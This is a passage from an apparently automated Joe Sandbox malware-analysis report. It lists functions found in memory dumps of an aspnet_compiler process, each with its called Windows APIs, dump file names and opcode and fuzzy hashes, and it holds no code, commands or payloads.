                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 45 a5fae8-a5fafd LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                Function 00A5FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 46 a5fb68-a5fb7d LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                Function 00A5FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 47 a5fdc0-a5fdd5 LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                Function 0042C0E3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 29 42c0e3-42c121 call 404593 call 42cf73 RtlFreeHeap
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,55CCCCC3,00000007,00000000,00000004,00000000,004168EC,000000F4), ref: 0042C11C
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                                • Instruction ID: d601fce2e6cfc47c523398d08e96a68e9c79fc9ca5f02ac62e6cc3558dbc2de4
                                                                • Opcode Fuzzy Hash: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                                • Instruction Fuzzy Hash: D4E0EDB2244214BBD614EF99DC41F9B77ADDFC9714F004459FA08A7281D674BD14CAB8
                                                                Function 0042C0A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 24 42c0a3-42c0e1 call 404593 call 42cf73 RtlAllocateHeap
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(?,0041DE11,?,?,00000000,?,0041DE11,?,?,?), ref: 0042C0DC
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                                • Instruction ID: e057fd75638c54c2a83d139f9191c8a4f81c752b1f28dea9c101fe2514506ad0
                                                                • Opcode Fuzzy Hash: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                                • Instruction Fuzzy Hash: 68E06DB1204204BBDA14EE99EC41FAB37ACEFC9714F104019FA08A7281C674BD1487F8
                                                                Function 0042C123 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 39 42c123-42c15c call 404593 call 42cf73 ExitProcess
                                                                APIs
                                                                • ExitProcess.KERNELBASE(?), ref: 0042C157
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_400000_aspnet_compiler.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID:
                                                                • API String ID: 621844428-0
                                                                • Opcode ID: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                                • Instruction ID: 5b3de0624fe0a28c818fb70999a8e3532c71153bdfbe5aac28f931c41c5855af
                                                                • Opcode Fuzzy Hash: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                                • Instruction Fuzzy Hash: 10E086352402147BC610EB5ADC41F9B776CDFC5714F108419FA0CA7181C671BA1487F4

                                                                Non-executed Functions

                                                                Function 00A50080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: [Pj
                                                                • API String ID: 0-2289356113
                                                                • Opcode ID: 60f2316d6eaeb53bbb1314daca49bb0423da01e2431511e151184366325059f3
                                                                • Instruction ID: d53cc8aeb0f9eb8a30a86bec985dad9fa390912f6c902777d787de218c69ff2f
                                                                • Opcode Fuzzy Hash: 60f2316d6eaeb53bbb1314daca49bb0423da01e2431511e151184366325059f3
                                                                • Instruction Fuzzy Hash: CBF09032204344BBEB22DB20CD85F2A7BA9BF95755F148858FD456A0D3C772D825E721
                                                                Function 00A726F8 Relevance: .0, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                • Instruction ID: 2a0d67e292e6c11b942066b4faf77c2d3fb7efe4aa1005d8e5ccaeed8feae86b
                                                                • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                • Instruction Fuzzy Hash: 66F0C231724559ABDB4CEB189E61B6A33E5EB94300F54C079ED4DC7252E631DE408390
                                                                Function 00AB0101 Relevance: .0, Instructions: 31COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                • Instruction ID: 2ebbae068446fb7a579586815ee28d00088f9d2ab530109f8dce7f5754d35ede
                                                                • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                • Instruction Fuzzy Hash: 7DF082722402049FCB1CCF09D490FFA37BAAB80715F24412DE50B8F692D7359841CA54
                                                                Function 00A500EA Relevance: .0, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c8ea1faa667ac2758221f0e4050b2e6dc8a53efef2be04e6cc28479f18658faf
                                                                • Instruction ID: f076fc232c993740e9aea0226a7d9b7687856e57331b8a179f6f0bda7c371603
                                                                • Opcode Fuzzy Hash: c8ea1faa667ac2758221f0e4050b2e6dc8a53efef2be04e6cc28479f18658faf
                                                                • Instruction Fuzzy Hash: 67E0E572544A819FD311DF149A01B1AB3E4FF89B11F15493AF80597A90D7789A098952
                                                                Function 00A600C4 Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                Function 00A60060 Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                Function 00A60078 Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                Function 00A60048 Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                Function 00A601D4 Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                Function 00A6010C Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                Function 00A60C40 Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                Function 00A610D0 Relevance: .0, Instructions: 6COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.536526525.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                                • Associated: 0000000D.00000002.536526525.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000B50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.536526525.0000000000BB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_a40000_aspnet_compiler.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
